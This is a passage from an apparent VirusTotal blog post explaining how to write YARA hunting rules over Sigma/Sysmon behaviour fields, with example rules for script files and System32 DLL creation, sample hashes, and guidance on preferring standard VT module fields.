style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"Details"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".vbs"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">or</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"Details"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".bat"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">}</span>
</p></div>
<div class="interval_12"> Running this YARA using a <a href="https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt" target="_blank">Retrohunt</a> finds multiple files:
</div>
<div class="my-yara-code interval_12">
daef729493b9061e7048b4df10b71fdba2e11d9147512f48463994a88c834a30
141e87e62c110b86cf7b01a2def60faab6365f6391eb0d4a7cbad8d480dd4706
814b2cab7c5a12ec18f345eb743857e74f5be45c35642dc01330e7a0def6269a
31b0e9b188fe944d58867bbfc827d77c7711c3a690168a417377fe6bf1544408
dd6051509ed8cf3d059b538fa8878f87423c51b297b49a12144d3d2923c89cce
647323f0245da631cef57d9ca1e3327c3242fe1cbbf6582c4d187e9f5fbfb678
40a90dd3b2132a299f725e91a5d0127013b21af24074afb944d8bc5735c1bd53
b44c6d2dd8ad93cecd795cecde83081292ee9949d65b2e98d4a2a3c8a97bd936
710b0cca7e7c17a3dd2a309f5ca417b76429feac1ab5fb60f5502995ebbd1515
50c098119ce41771e7a3b8230a7aa61ebea925e8eda46c33f0dd42b8950b92fe
</div>
<div class="interval_12"> Here you can see some interesting matches:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/sZLZhAfbKUNhk9RujX-DtJkb9Kg9yFT85fYEcpeyX1fdnglquAV0b8uZv8p4SodmKDpZjUEBp16rEV8ALiwRFYsewYdOBqKuA3b_5dcn9e1fMvHnYZLknfiOPrQ6G81-4408Huvi6-STzDJyC47X5IUuioFoMxljA8CN5dDaz0na3rnpyIM6Stz0aBHIgkJfuVEFe2rZGUCptk5k3KxWyD6DaNAmq6ZV62Efzw" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> The next rule focuses on file creation events related to Sysmon (EVID 11) under the “C:\Windows\System32” directory, with a “.dll” extension and having any “cve” tag (flagging potential CVE exploitation). Remember we can always include any additional details related to the samples we want to hunt, such as positives, metadata, tags, engines, … in addition to EVTX fields:
</div>
<div class="my-yara-code interval_12"><p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">import</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"vt"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">rule</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
sigma_rule_evtx_cve </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">{</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">meta</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> target_entity
= </span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"file"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">condition</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt.behaviour.sigma_analysis_results: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results_match_context </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results.match_context: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"TargetFilename"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">startswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"C:\\Windows\\System32\\"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"TargetFilename"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">endswith</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">".dll"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">and</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_metadata_tags </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt.metadata.tags: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_metadata_tags
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">icontains</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"cve-"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">)</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">}</span>
</p></div>
<h2 style="text-align: left;">Sysmon EVTX fields - overlaps
</h2>
<div class="interval_12"> Some of the details found in Sysmon EVTX fields (found in the VT JSON samples’ structure) can be redundant with details provided in other more traditional fields that you use for your Livehunt rules through the YARA VT module.
</div>
<div class="interval_12"> For example, instead of:
<mark class="my-yara-code">vt_behaviour_sigma_analysis_results_match_context.values["TargetFilename"]</mark> from <mark class="my-yara-code">vt.behaviour.sigma_analysis_results</mark>
</div>
<div class="interval_12"> you could use: <mark class="my-yara-code">vt.behaviour.files_written</mark> to identify file creation events.
</div>
<div class="interval_12"> When that’s the case, we recommend using traditional <a href="https://docs.virustotal.com/docs/writing-yara-rules-for-livehunt" target="_blank">fields</a> found in VT samples’ structure for the following reasons:
</div>
<div class="interval_12"> <ul>
<li>Sysmon information is fully stored/indexed only the part matching the Sigma rule, which will limit any YARA hunting.
</li>
<li>We mapped most Sysmon fields into YARA VT module for simplicity.
</li>
<li>Linux and MacOS samples do not have any Sysmon information related to Sigma rules. Similar details about the match can be found under the “behaviour” JSON structure entry.
</li>
</ul> </div>
<div class="interval_12"> The new Sysmon-like details offered in the file “structure” also make VT an excellent platform for researchers and Sigma rule creators, allowing them to leverage this information without the need to create their own lab.
</div>
<div class="interval_12"> The following table helps mapping VT Intelligence queries, YARA VT module fields, Sigma Categories, and Sigma fields:
</div>
<div class="interval_12">
<table style="border-collapse: collapse; border: none;">
<colgroup>
<col width="152">
</col>
<col width="185">
</col>
<col width="144">
</col>
<col width="144">
</col>
</colgroup>
<tbody>
<tr style="height: 15.75pt;" class="table-fields">
<td
style="background-color: #9900ff; border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">VT
Intelligence</span></p>
</td>
<td
